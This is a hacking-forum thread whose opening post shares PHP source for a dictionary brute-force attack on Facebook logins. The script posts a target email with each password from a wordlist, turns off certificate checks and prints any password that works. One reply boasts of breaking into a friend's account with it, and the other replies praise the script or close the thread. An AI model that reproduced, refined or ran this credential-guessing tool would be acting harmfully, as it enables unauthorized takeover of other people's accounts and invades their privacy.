Login Register


Fac3book Bruteforcing (source) filter_list
Author
Message
Fac3book Bruteforcing (source) #1
Ok Guyz!
To make this script work, you will need a server with apache
& obviously where Brutef0rcing is concerned you will need a user/pass list
You can easily find one. or make one! a word tool u can find on many cracking forums

PHP Code:
set_time_limit(0); $username ="brute@force.org"; // username to brute force $dictionary ="dictionary.txt"; // need dictionary to password list function kontrol($kullaniciadi,$sifre){ $useragent = "Opera/9.21 (Windows NT 5.1; U; tr)"; $data = "email=$kullaniciadi&pass=$sifre&login=Login" ; $ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php'); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); $source=curl_exec ($ch); curl_close ($ch); if(eregi("Home</title>",$source)){return true;} else {return false;} } if(!is_file($dictionary)){echo "$dictionary is not file";exit;} $lines=file($dictionary); echo "Attack Starting..<br>"; sleep(10); echo "Attack Started, brute forcing..<br>"; foreach($lines as $line){ $line=str_replace("\r","",$line); $line=str_replace("\n","",$line); if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - P assword found : $line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;} else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found : $line</font><br>";} } ?>
it just need some professional hands for modification
Wink


RE: Fac3book Bruteforcing (source) #2
yeah ...
i like this you script Biggrin
Indonesia Blackhat Team
http://ycl.sch.id



RE: Fac3book Bruteforcing (source) #3
Be shak Wo Log jo MUSALMANO main be-Hayai phelana chahtay hain un k liye dunya aor Akhirat mai dardNak Aazab hay (Surah Noor # 24, Ayat # 19, Para # 18)


RE: Fac3book Bruteforcing (source) #4
All do respect but i thought facebook patched the bruteforcing i tried many and what makes this script special


RE: Fac3book Bruteforcing (source) #5
(03-31-2012, 05:09 PM)indonesia21 Wrote: yeah ...
i like this you script Biggrin
The Pleasure is all mine!

(04-01-2012, 11:10 PM)Arrival Wrote: Be shak Wo Log jo MUSALMANO main be-Hayai phelana chahtay hain un k liye dunya aor Akhirat mai dardNak Aazab hay (Surah Noor # 24, Ayat # 19, Para # 18)
yaar ye php script kay liye tha ya meray signature kay liye??


RE: Fac3book Bruteforcing (source) #6
Thanks for the share I got my friends account and he was like WTF How? I was all like trade secret Tongue
If I helped you or if you are feeling a bit generous please click the adf.ly link! http://adf.ly/FIKwX

[Image: at.png]



RE: Fac3book Bruteforcing (source) #7
wow i like it ♥ ♥


RE: Fac3book Bruteforcing (source) #8
(10-18-2013, 01:13 PM)Hemin Michael Wrote: wow i like it ♥ ♥

Don't dig up old posts especially just to say "thanks" or "I like it"
/closed
If you need help feel free to PM me
[Image: klfpJD]
Probitcoin
Freebitcoin
BTC clicks
bitcoin wallet:
1FBPAanbs3rJU9BUpobpDJc9hHUaCaC25N








Users browsing this thread: